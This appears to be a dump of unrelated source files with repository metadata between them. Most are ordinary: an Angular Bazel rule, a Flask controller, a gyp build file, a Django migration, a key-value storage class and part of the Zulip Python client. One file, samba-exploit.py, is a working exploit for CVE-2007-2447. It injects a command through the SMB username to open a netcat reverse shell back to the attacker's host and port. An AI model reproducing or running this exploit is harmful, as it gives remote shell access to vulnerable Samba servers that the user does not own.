doc = """The npm packages which should be available during the compile.
The default value of `@npm//typescript:typescript__typings` is
for projects that use bazel managed npm deps. It is recommended
that you use the workspace name `@npm` for bazel managed deps so the
default value works out of the box. Otherwise, you'll have to
override the node_modules attribute manually. This default is in place
since code compiled by ng_module will always depend on at least the
typescript default libs which are provided by
`@npm//typescript:typescript__typings`.
This attribute is DEPRECATED. As of version 0.18.0 the recommended
approach to npm dependencies is to use fine grained npm dependencies
which are setup with the `yarn_install` or `npm_install` rules.
For example, in targets that used a `//:node_modules` filegroup,
```
ng_module(
name = "my_lib",
...
node_modules = "//:node_modules",
)
```
which specifies all files within the `//:node_modules` filegroup
to be inputs to the `my_lib`. Using fine grained npm dependencies,
`my_lib` is defined with only the npm dependencies that are
needed:
```
ng_module(
name = "my_lib",
...
deps = [
"@npm//@types/foo",
"@npm//@types/bar",
"@npm//foo",
"@npm//bar",
...
],
)
```
In this case, only the listed npm packages and their
transitive deps are includes as inputs to the `my_lib` target
which reduces the time required to setup the runfiles for this
target (see https://github.com/bazelbuild/bazel/issues/5153).
The default typescript libs are also available via the node_modules
default in this case.
The @npm external repository and the fine grained npm package
targets are setup using the `yarn_install` or `npm_install` rule
in your WORKSPACE file:
yarn_install(
name = "npm",
package_json = "//:package.json",
yarn_lock = "//:yarn.lock",
)
""",
default = Label("@npm//typescript:typescript__typings"),
),
"entry_point": attr.label(allow_single_file = True),
# Default is %{name}_public_index
# The suffix points to the generated "bundle index" files that users import from
# The default is intended to avoid collisions with the users input files.
# Later packaging rules will point to these generated files as the entry point
# into the package.
# See the flatModuleOutFile documentation in
# https://github.com/angular/angular/blob/master/packages/compiler-cli/src/transformers/api.ts
"flat_module_out_file": attr.string(),
"bundle_dts": attr.bool(default = False),
"api_extractor": attr.label(
default = Label(DEFAULT_API_EXTRACTOR),
executable = True,
cfg = "host",
),
# Should the rule generate ngfactory and ngsummary shim files?
"generate_ve_shims": attr.bool(default = False),
})
ng_module = rule(
implementation = _ng_module_impl,
attrs = NG_MODULE_RULE_ATTRS,
outputs = COMMON_OUTPUTS,
)
"""
Run the Angular AOT template compiler.
This rule extends the [ts_library] rule.
[ts_library]: http://tsetse.info/api/build_defs.html#ts_library
"""
def ng_module_macro(tsconfig = None, **kwargs):
"""Wraps `ng_module` to set the default for the `tsconfig` attribute.
This must be a macro so that the string is converted to a label in the context of the
workspace that declares the `ng_module` target, rather than the workspace that defines
`ng_module`, or the workspace where the build is taking place.
This macro is re-exported as `ng_module` in the public API.
Args:
tsconfig: the label pointing to a tsconfig.json file
**kwargs: remaining args to pass to the ng_module rule
"""
if not tsconfig:
tsconfig = "//:tsconfig.json"
ng_module(tsconfig = tsconfig, **kwargs)
| 38.864831 | 161 | 0.662867 |
5f57e5922e8612a59e84b62f54d4c5637eff5f20 | 395 | py | Python | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | podcast-ml/service/src/app/podcastml/controllers/recommend_episodes_for_topic_controller.py | cuappdev/archives | 061d0f9cccf278363ffaeb27fc655743b1052ae5 | [
"MIT"
] | null | null | null | from . import *
class RecommendEpisodesForTopicController(AppDevController):
def get_path(self):
return '/episodes/topic/<topic_id>/'
def get_methods(self):
return ['GET']
@authorize
def content(self, **kwargs):
topic_id = request.view_args['topic_id']
episode_ids = episodes_for_topic_dao.get_episode_list_for_topic(topic_id)
return {'episode_ids': episode_ids}
| 24.6875 | 77 | 0.736709 |
bbc475b2076d52f743a63c21f455aebb740d8f3f | 4,416 | gyp | Python | Mozc-for-iOS/src/ipc/ipc.gyp | spanfish/JapaneseKeyboard | 84fa7ef799d145fb9897b6e86bc7bc50610ccb2b | [
"Apache-2.0"
] | 33 | 2015-01-21T09:50:21.000Z | 2022-02-12T15:18:25.000Z | src/ipc/ipc.gyp | kishikawakatsumi/Mozc-for-iOS | 45b0856ed8a22d5fa6b4471548389cbde4abcf10 | [
"Apache-2.0"
] | 1 | 2015-05-12T06:26:54.000Z | 2017-11-01T14:43:35.000Z | Mozc-for-iOS/src/ipc/ipc.gyp | spanfish/JapaneseKeyboard | 84fa7ef799d145fb9897b6e86bc7bc50610ccb2b | [
"Apache-2.0"
] | 8 | 2015-06-08T15:57:25.000Z | 2019-05-15T08:52:58.000Z | # Copyright 2010-2014, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{
'variables': {
'relative_dir': 'ipc',
},
'targets': [
{
'target_name': 'ipc',
'type': 'static_library',
'sources': [
'android_ipc.cc',
'ipc.cc',
'ipc_mock.cc',
'ipc_path_manager.cc',
'mach_ipc.cc',
'named_event.cc',
'process_watch_dog.cc',
'unix_ipc.cc',
'win32_ipc.cc',
],
'dependencies': [
'../base/base.gyp:base',
'ipc_protocol',
],
'conditions': [
['target_platform=="Android"', {
'sources!': [
'ipc_path_manager.cc',
'process_watch_dog.cc',
],
}],
],
},
{
'target_name': 'ipc_protocol',
'type': 'static_library',
'hard_dependency': 1,
'sources': [
'<(proto_out_dir)/<(relative_dir)/ipc.pb.cc',
],
'dependencies': [
'../protobuf/protobuf.gyp:protobuf',
'genproto_ipc#host',
],
'export_dependent_settings': [
'genproto_ipc#host',
],
},
{
'target_name': 'genproto_ipc',
'type': 'none',
'toolsets': ['host'],
'sources': [
'ipc.proto',
],
'includes': [
'../protobuf/genproto.gypi',
],
},
{
'target_name': 'window_info_protocol',
'type': 'static_library',
'hard_dependency': 1,
'sources': [
'<(proto_out_dir)/<(relative_dir)/window_info.pb.cc',
],
'dependencies': [
'../protobuf/protobuf.gyp:protobuf',
'genproto_window_info#host',
],
'export_dependent_settings': [
'genproto_window_info#host',
],
},
{
'target_name': 'genproto_window_info',
'type': 'none',
'toolsets': ['host'],
'sources': [
'window_info.proto',
],
'includes': [
'../protobuf/genproto.gypi',
],
},
{
'target_name': 'ipc_test_util',
'type': 'static_library',
'sources': [
'ipc_test_util.cc',
],
'dependencies': [
'../base/base.gyp:base',
'ipc',
],
},
{
'target_name': 'ipc_test',
'type': 'executable',
'sources': [
'ipc_path_manager_test.cc',
'ipc_test.cc',
'named_event_test.cc',
'process_watch_dog_test.cc',
],
'dependencies': [
'../testing/testing.gyp:gtest_main',
'ipc',
'ipc_test_util',
],
'variables': {
'test_size': 'small',
},
},
# Test cases meta target: this target is referred from gyp/tests.gyp
{
'target_name': 'ipc_all_test',
'type': 'none',
'dependencies': [
'ipc_test',
],
'conditions': [
['target_platform=="Android"', {
# Android tests nothing.
'dependencies=': []
}],
],
},
],
}
| 27.773585 | 72 | 0.578125 |
0374b112cf62737de3ecded31c937ad26ccd7990 | 276 | py | Python | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | docs/API/Users_Guide/scripts/Basic_Troubleshooting.py | ZhenyuZ/gdc-docs | f024d5d4cd86dfa2c9e7d63850eee94d975b7948 | [
"Apache-2.0"
] | null | null | null | import requests
status_endpt = "https://api.gdc.cancer.gov/status"
response = requests.get(status_endpt)
# OUTPUT METHOD 1: Write to a file.
file = open("api_status.json", "w")
file.write(response.text)
file.close()
# OUTPUT METHOD 2: View on screen.
print(response.content) | 25.090909 | 50 | 0.746377 |
5bf139de1fd12efca36c46bef4bc162f6da33430 | 761 | py | Python | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 1 | 2019-11-11T17:02:12.000Z | 2019-11-11T17:02:12.000Z | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 17 | 2019-12-05T02:07:59.000Z | 2022-02-03T12:59:06.000Z | whiteboard/migrations/0006_lift_user.py | DanSparkes/Whiteboard | d084c3513d876fdbba092eae21c3a3fabd6d51da | [
"MIT"
] | 1 | 2019-11-16T17:25:40.000Z | 2019-11-16T17:25:40.000Z | # Generated by Django 2.2.6 on 2019-11-11 20:06
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("whiteboard", "0005_auto_20191109_2046"),
]
operations = [
migrations.AddField(
model_name="lift",
name="user",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.CASCADE,
related_name="lifts",
to=settings.AUTH_USER_MODEL,
verbose_name="User",
),
preserve_default=False,
),
]
| 26.241379 | 66 | 0.592641 |
a5ac15dd4d1459628946139f4ac9c7aa7635f56c | 195 | py | Python | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | 5 | 2019-02-11T20:39:05.000Z | 2022-01-11T13:25:45.000Z | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | null | null | null | python/const.py | tribbloid/convnet-abstraction | 8827c1dd8b19462bd0499cd0a8d81a8688e7fc48 | [
"Apache-2.0"
] | 1 | 2019-06-29T11:45:30.000Z | 2019-06-29T11:45:30.000Z | import matplotlib.pyplot as plt
import mxnet as mx
CTX = mx.gpu() if mx.test_utils.list_gpus() else mx.cpu()
# print(f"=== MXNet is using {CTX} ===")
MODEL_CHKPNT: str = ".model_checkpoints"
| 19.5 | 57 | 0.692308 |
83388b308770b2e3d7900978aa24947b446fb35c | 1,113 | py | Python | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | 2 | 2021-03-28T16:23:21.000Z | 2021-11-16T01:47:09.000Z | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | null | null | null | samba-exploit.py | ozuma/CVE-2007-2447 | b8573030e7e34942f477928576256162fd22beff | [
"MIT"
] | 2 | 2021-03-28T16:23:23.000Z | 2021-11-16T01:47:09.000Z | #!/usr/bin/python3
# Ref: https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py
# Ref: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
# Product: Samba
# Vuln: CVE-2007-2447
# Exploit-DB: https://www.exploit-db.com/exploits/16320
#
# install: pip3 install pysmb
import sys
import platform
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/f; nc ' + lhost + ' ' + lport + ' 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username,"","","")
conn.connect(rhost, int(rport))
if __name__ == '__main__':
print("[*] CVE-2007-2447 - Samba usermap script")
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
print("[-] at another terminal, $ nc -lvnp <LPORT>")
else:
print("[+] Connecting")
rhost = sys.argv[1]
rport = sys.argv[2] # Usually 139/tcp
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)
| 32.735294 | 104 | 0.614555 |
07928766a6137baf3659f56c8651da9cec483cc4 | 1,892 | py | Python | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | 2 | 2021-07-24T01:01:17.000Z | 2021-07-25T18:53:01.000Z | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | null | null | null | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import json
from utils import get_logger
logger = get_logger()
class Storage():
"""
This is a class manages the storage of key value store.
It contains two methods read() and write(). We use these methods
to read and write in a file.
"""
def __init__(self):
"""
Check if file exists. If doesn't exist then it creates a new file.
After creating new file it writes a empty json in the file.
"""
try:
if not os.path.exists("store.json"):
file = open('store.json', 'x')
with open('store.json', 'w') as file:
json.dump({}, file)
except Exception as error:
logger.error("Unexpected error:", error)
raise Exception("Unable to initialize Storage")
def read(self):
"""
The function is used to create[if doesn't exist]/read the file.
Then we store the data in a variable and return it.
Returns:
KVSTORE: Data from the file. If new file we return empty json.
"""
try:
# Reads the file
with open('store.json', 'r') as file:
data = file.read()
# Converts file data into a json
KVSTORE = json.loads(data)
return KVSTORE
except Exception as error:
logger.error("Unexpected error:", error)
raise Exception("Unable to read Storage")
def write(self, data):
"""
The function is used to write data in file.
Parameters:
data: Data to write in file.
"""
try:
with open('store.json', 'w') as file:
json.dump(data, file)
except Exception as error:
logger.error("Unexpected error:", error)
raise Exception("Unable to write in Storage")
| 28.666667 | 74 | 0.552326 |
4088c6556087b9d349da882813b2805a90ce00f5 | 524 | py | Python | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | '''
These functions have nothing to do with the API, they just help ease
issues between Python 2 and 3
'''
def get_input(string):
''' Get input from console regardless of python 2 or 3 '''
try:
return raw_input(string)
except:
return input(string)
def get_config():
''' Create a config parser for reading INI files '''
try:
import ConfigParser
return ConfigParser.ConfigParser()
except:
import configparser
return configparser.ConfigParser()
| 24.952381 | 72 | 0.648855 |
81989892de9f9891f871cd840253e292f920132f | 62,777 | py | Python | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | import argparse
import json
import logging
import optparse
import os
import platform
import random
import sys
import time
import traceback
import types
import urllib.parse
from configparser import ConfigParser
from typing import (
IO,
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import distro
import requests
from typing_extensions import Literal
__version__ = "0.8.2"
# Ensure the Python version is supported
assert sys.version_info >= (3, 6)
logger = logging.getLogger(__name__)
# In newer versions, the 'json' attribute is a function, not a property
requests_json_is_function = callable(requests.Response.json)
API_VERSTRING = "v1/"
# An optional parameter to `move_topic` and `update_message` actions
# See eg. https://zulip.com/api/update-message#parameter-propagate_mode
EditPropagateMode = Literal["change_one", "change_all", "change_later"]
# Generally a `reaction_type` is present whenever an emoji is specified:
# - Optional parameters to actions: `add_reaction`, `remove_reaction`
# - Events: "user_status", "reaction", "message", "update_message"
# - Inside each reaction in the `reactions` field of returned message objects.
EmojiType = Literal["realm_emoji", "unicode_emoji", "zulip_extra_emoji"]
# Message flags which may be directly modified by the current user:
# - Updated by `update_message_flags` (and for the `read` flag, also
# the `mark_all_as_read`, `mark_stream_as_read`, and
# `mark_topic_as_read` actions).
# - User is notified of changes via `update_message_flags` events.
# See subset of https://zulip.com/api/update-message-flags#available-flags
ModifiableMessageFlag = Literal["read", "starred", "collapsed"]
# All possible message flags.
# - Generally present in `flags` object of returned message objects.
# - User is notified of changes via "update_message_flags" and `update_message`
# events. The latter is important for clients to learn when a message is
# edited to mention the current user or contain an alert word.
# See https://zulip.com/api/update-message-flags#available-flags
MessageFlag = Literal[
ModifiableMessageFlag,
"mentioned",
"wildcard_mentioned",
"has_alert_word",
"historical",
]
class CountingBackoff:
def __init__(
self,
maximum_retries: int = 10,
timeout_success_equivalent: Optional[float] = None,
delay_cap: float = 90.0,
) -> None:
"""Sets up a retry-backoff object. Example usage:
backoff = zulip.CountingBackoff()
while backoff.keep_going():
try:
something()
backoff.succeed()
except Exception:
backoff.fail()
timeout_success_equivalent is used in cases where 'success' is
never possible to determine automatically; it sets the
threshold in seconds before the next keep_going/fail, above
which the last run is treated like it was a success.
"""
self.number_of_retries = 0
self.maximum_retries = maximum_retries
self.timeout_success_equivalent = timeout_success_equivalent
self.last_attempt_time = 0.0
self.delay_cap = delay_cap
def keep_going(self) -> bool:
self._check_success_timeout()
return self.number_of_retries < self.maximum_retries
def succeed(self) -> None:
self.number_of_retries = 0
self.last_attempt_time = time.time()
def fail(self) -> None:
self._check_success_timeout()
self.number_of_retries = min(self.number_of_retries + 1, self.maximum_retries)
self.last_attempt_time = time.time()
def _check_success_timeout(self) -> None:
if (
self.timeout_success_equivalent is not None
and self.last_attempt_time != 0
and time.time() - self.last_attempt_time > self.timeout_success_equivalent
):
self.number_of_retries = 0
class RandomExponentialBackoff(CountingBackoff):
def fail(self) -> None:
super().fail()
# Exponential growth with ratio sqrt(2); compute random delay
# between x and 2x where x is growing exponentially
delay_scale = int(2 ** (self.number_of_retries / 2.0 - 1)) + 1
delay = min(delay_scale + random.randint(1, delay_scale), self.delay_cap)
message = f"Sleeping for {delay}s [max {delay_scale * 2}] before retrying."
try:
logger.warning(message)
except NameError:
print(message)
time.sleep(delay)
def _default_client() -> str:
return "ZulipPython/" + __version__
def add_default_arguments(
parser: argparse.ArgumentParser,
patch_error_handling: bool = True,
allow_provisioning: bool = False,
) -> argparse.ArgumentParser:
if patch_error_handling:
def custom_error_handling(self: argparse.ArgumentParser, message: str) -> None:
self.print_help(sys.stderr)
self.exit(2, f"{self.prog}: error: {message}\n")
parser.error = types.MethodType(custom_error_handling, parser) # type: ignore # patching function
if allow_provisioning:
parser.add_argument(
"--provision",
action="store_true",
dest="provision",
help="install dependencies for this script (found in requirements.txt)",
)
group = parser.add_argument_group("Zulip API configuration")
group.add_argument("--site", dest="zulip_site", help="Zulip server URI", default=None)
group.add_argument("--api-key", dest="zulip_api_key", action="store")
group.add_argument(
"--user", dest="zulip_email", help="Email address of the calling bot or user."
)
group.add_argument(
"--config-file",
action="store",
dest="zulip_config_file",
help="""Location of an ini file containing the above
information. (default ~/.zuliprc)""",
)
group.add_argument("-v", "--verbose", action="store_true", help="Provide detailed output.")
group.add_argument(
"--client", action="store", default=None, dest="zulip_client", help=argparse.SUPPRESS
)
group.add_argument(
"--insecure",
action="store_true",
dest="insecure",
help="""Do not verify the server certificate.
The https connection will not be secure.""",
)
group.add_argument(
"--cert-bundle",
action="store",
dest="cert_bundle",
help="""Specify a file containing either the
server certificate, or a set of trusted
CA certificates. This will be used to
verify the server's identity. All
certificates should be PEM encoded.""",
)
group.add_argument(
"--client-cert",
action="store",
dest="client_cert",
help="""Specify a file containing a client
certificate (not needed for most deployments).""",
)
group.add_argument(
"--client-cert-key",
action="store",
dest="client_cert_key",
help="""Specify a file containing the client
certificate's key (if it is in a separate
file).""",
)
return parser
# This method might seem redundant with `add_default_arguments()`,
# except for the fact that is uses the deprecated `optparse` module.
# We still keep it for legacy support of out-of-tree bots and integrations
# depending on it.
def generate_option_group(parser: optparse.OptionParser, prefix: str = "") -> optparse.OptionGroup:
logging.warning(
"""zulip.generate_option_group is based on optparse, which
is now deprecated. We recommend migrating to argparse and
using zulip.add_default_arguments instead."""
)
group = optparse.OptionGroup(parser, "Zulip API configuration")
group.add_option(f"--{prefix}site", dest="zulip_site", help="Zulip server URI", default=None)
group.add_option(f"--{prefix}api-key", dest="zulip_api_key", action="store")
group.add_option(
f"--{prefix}user",
dest="zulip_email",
help="Email address of the calling bot or user.",
)
group.add_option(
f"--{prefix}config-file",
action="store",
dest="zulip_config_file",
help="Location of an ini file containing the\nabove information. (default ~/.zuliprc)",
)
group.add_option("-v", "--verbose", action="store_true", help="Provide detailed output.")
group.add_option(
f"--{prefix}client",
action="store",
default=None,
dest="zulip_client",
help=optparse.SUPPRESS_HELP,
)
group.add_option(
"--insecure",
action="store_true",
dest="insecure",
help="""Do not verify the server certificate.
The https connection will not be secure.""",
)
group.add_option(
"--cert-bundle",
action="store",
dest="cert_bundle",
help="""Specify a file containing either the
server certificate, or a set of trusted
CA certificates. This will be used to
verify the server's identity. All
certificates should be PEM encoded.""",
)
group.add_option(
"--client-cert",
action="store",
dest="client_cert",
help="""Specify a file containing a client
certificate (not needed for most deployments).""",
)
group.add_option(
"--client-cert-key",
action="store",
dest="client_cert_key",
help="""Specify a file containing the client
certificate's key (if it is in a separate
file).""",
)
return group
def init_from_options(options: Any, client: Optional[str] = None) -> "Client":
if getattr(options, "provision", False):
requirements_path = os.path.abspath(os.path.join(sys.path[0], "requirements.txt"))
try:
import pip
except ImportError:
traceback.print_exc()
print(
"Module `pip` is not installed. To install `pip`, follow the instructions here: "
"https://pip.pypa.io/en/stable/installing/"
)
sys.exit(1)
if not pip.main(["install", "--upgrade", "--requirement", requirements_path]):
print(
"{color_green}You successfully provisioned the dependencies for {script}.{end_color}".format(
color_green="\033[92m",
end_color="\033[0m",
script=os.path.splitext(os.path.basename(sys.argv[0]))[0],
)
)
sys.exit(0)
if options.zulip_client is not None:
client = options.zulip_client
elif client is None:
client = _default_client()
return Client(
email=options.zulip_email,
api_key=options.zulip_api_key,
config_file=options.zulip_config_file,
verbose=options.verbose,
site=options.zulip_site,
client=client,
cert_bundle=options.cert_bundle,
insecure=options.insecure,
client_cert=options.client_cert,
client_cert_key=options.client_cert_key,
)
def get_default_config_filename() -> Optional[str]:
if os.environ.get("HOME") is None:
return None
config_file = os.path.join(os.environ["HOME"], ".zuliprc")
if not os.path.exists(config_file) and os.path.exists(
os.path.join(os.environ["HOME"], ".humbugrc")
):
raise ZulipError(
"The Zulip API configuration file is now ~/.zuliprc; please run:\n\n"
" mv ~/.humbugrc ~/.zuliprc\n"
)
return config_file
def validate_boolean_field(field: Optional[str]) -> Union[bool, None]:
if not isinstance(field, str):
return None
field = field.lower()
if field == "true":
return True
elif field == "false":
return False
else:
return None
class ZulipError(Exception):
pass
class ConfigNotFoundError(ZulipError):
pass
class MissingURLError(ZulipError):
pass
class UnrecoverableNetworkError(ZulipError):
pass
class Client:
def __init__(
self,
email: Optional[str] = None,
api_key: Optional[str] = None,
config_file: Optional[str] = None,
verbose: bool = False,
retry_on_errors: bool = True,
site: Optional[str] = None,
client: Optional[str] = None,
cert_bundle: Optional[str] = None,
insecure: Optional[bool] = None,
client_cert: Optional[str] = None,
client_cert_key: Optional[str] = None,
) -> None:
if client is None:
client = _default_client()
# Normalize user-specified path
if config_file is not None:
config_file = os.path.abspath(os.path.expanduser(config_file))
# Fill values from Environment Variables if not available in Constructor
if config_file is None:
config_file = os.environ.get("ZULIP_CONFIG")
if api_key is None:
api_key = os.environ.get("ZULIP_API_KEY")
if email is None:
email = os.environ.get("ZULIP_EMAIL")
if site is None:
site = os.environ.get("ZULIP_SITE")
if client_cert is None:
client_cert = os.environ.get("ZULIP_CERT")
if client_cert_key is None:
client_cert_key = os.environ.get("ZULIP_CERT_KEY")
if cert_bundle is None:
cert_bundle = os.environ.get("ZULIP_CERT_BUNDLE")
if insecure is None:
# Be quite strict about what is accepted so that users don't
# disable security unintentionally.
insecure_setting = os.environ.get("ZULIP_ALLOW_INSECURE")
if insecure_setting is not None:
insecure = validate_boolean_field(insecure_setting)
if insecure is None:
raise ZulipError(
"The ZULIP_ALLOW_INSECURE environment "
"variable is set to '{}', it must be "
"'true' or 'false'".format(insecure_setting)
)
if config_file is None:
config_file = get_default_config_filename()
if config_file is not None and os.path.exists(config_file):
config = ConfigParser()
with open(config_file) as f:
config.read_file(f, config_file)
if api_key is None:
api_key = config.get("api", "key")
if email is None:
email = config.get("api", "email")
if site is None and config.has_option("api", "site"):
site = config.get("api", "site")
if client_cert is None and config.has_option("api", "client_cert"):
client_cert = config.get("api", "client_cert")
if client_cert_key is None and config.has_option("api", "client_cert_key"):
client_cert_key = config.get("api", "client_cert_key")
if cert_bundle is None and config.has_option("api", "cert_bundle"):
cert_bundle = config.get("api", "cert_bundle")
if insecure is None and config.has_option("api", "insecure"):
# Be quite strict about what is accepted so that users don't
# disable security unintentionally.
insecure_setting = config.get("api", "insecure")
insecure = validate_boolean_field(insecure_setting)
if insecure is None:
raise ZulipError(
"insecure is set to '{}', it must be "
"'true' or 'false' if it is used in {}".format(
insecure_setting, config_file
)
)
elif None in (api_key, email):
raise ConfigNotFoundError(
f"api_key or email not specified and file {config_file} does not exist"
)
assert api_key is not None and email is not None
self.api_key = api_key
self.email = email
self.verbose = verbose
if site is not None:
if site.startswith("localhost"):
site = "http://" + site
elif not site.startswith("http"):
site = "https://" + site
# Remove trailing "/"s from site to simplify the below logic for adding "/api"
site = site.rstrip("/")
self.base_url = site
else:
raise MissingURLError("Missing Zulip server URL; specify via --site or ~/.zuliprc.")
if not self.base_url.endswith("/api"):
self.base_url += "/api"
self.base_url += "/"
self.retry_on_errors = retry_on_errors
self.client_name = client
if insecure:
logger.warning(
"Insecure mode enabled. The server's SSL/TLS "
"certificate will not be validated, making the "
"HTTPS connection potentially insecure"
)
self.tls_verification = False # type: Union[bool, str]
elif cert_bundle is not None:
if not os.path.isfile(cert_bundle):
raise ConfigNotFoundError(f"tls bundle '{cert_bundle}' does not exist")
self.tls_verification = cert_bundle
else:
# Default behavior: verify against system CA certificates
self.tls_verification = True
if client_cert is None:
if client_cert_key is not None:
raise ConfigNotFoundError(
"client cert key '%s' specified, but no client cert public part provided"
% (client_cert_key,)
)
else: # we have a client cert
if not os.path.isfile(client_cert):
raise ConfigNotFoundError(f"client cert '{client_cert}' does not exist")
if client_cert_key is not None:
if not os.path.isfile(client_cert_key):
raise ConfigNotFoundError(f"client cert key '{client_cert_key}' does not exist")
self.client_cert = client_cert
self.client_cert_key = client_cert_key
self.session = None # type: Optional[requests.Session]
self.has_connected = False
server_settings = self.get_server_settings()
self.zulip_version: Optional[str] = server_settings.get("zulip_version")
self.feature_level: int = server_settings.get("zulip_feature_level", 0)
assert self.zulip_version is not None
def ensure_session(self) -> None:
# Check if the session has been created already, and return
# immediately if so.
if self.session:
return
# Build a client cert object for requests
if self.client_cert_key is not None:
assert self.client_cert is not None # Otherwise ZulipError near end of __init__
client_cert = (
self.client_cert,
self.client_cert_key,
) # type: Union[None, str, Tuple[str, str]]
else:
client_cert = self.client_cert
# Actually construct the session
session = requests.Session()
session.auth = requests.auth.HTTPBasicAuth(self.email, self.api_key)
session.verify = self.tls_verification
session.cert = client_cert
session.headers.update({"User-agent": self.get_user_agent()})
self.session = session
def get_user_agent(self) -> str:
vendor = ""
vendor_version = ""
try:
vendor = platform.system()
vendor_version = platform.release()
except OSError:
# If the calling process is handling SIGCHLD, platform.system() can
# fail with an IOError. See http://bugs.python.org/issue9127
pass
if vendor == "Linux":
vendor, vendor_version, dummy = distro.linux_distribution()
elif vendor == "Windows":
vendor_version = platform.win32_ver()[1]
elif vendor == "Darwin":
vendor_version = platform.mac_ver()[0]
return "{client_name} ({vendor}; {vendor_version})".format(
client_name=self.client_name,
vendor=vendor,
vendor_version=vendor_version,
)
def do_api_query(
self,
orig_request: Mapping[str, Any],
url: str,
method: str = "POST",
longpolling: bool = False,
files: Optional[List[IO[Any]]] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
if files is None:
files = []
if longpolling:
# When long-polling, set timeout to 90 sec as a balance
# between a low traffic rate and a still reasonable latency
# time in case of a connection failure.
request_timeout = 90.0
else:
# Otherwise, 15s should be plenty of time.
request_timeout = 15.0 if not timeout else timeout
request = {}
req_files = []
for (key, val) in orig_request.items():
if isinstance(val, str) or isinstance(val, str):
request[key] = val
else:
request[key] = json.dumps(val)
for f in files:
req_files.append((f.name, f))
self.ensure_session()
assert self.session is not None
query_state = {
"had_error_retry": False,
"request": request,
"failures": 0,
} # type: Dict[str, Any]
def error_retry(error_string: str) -> bool:
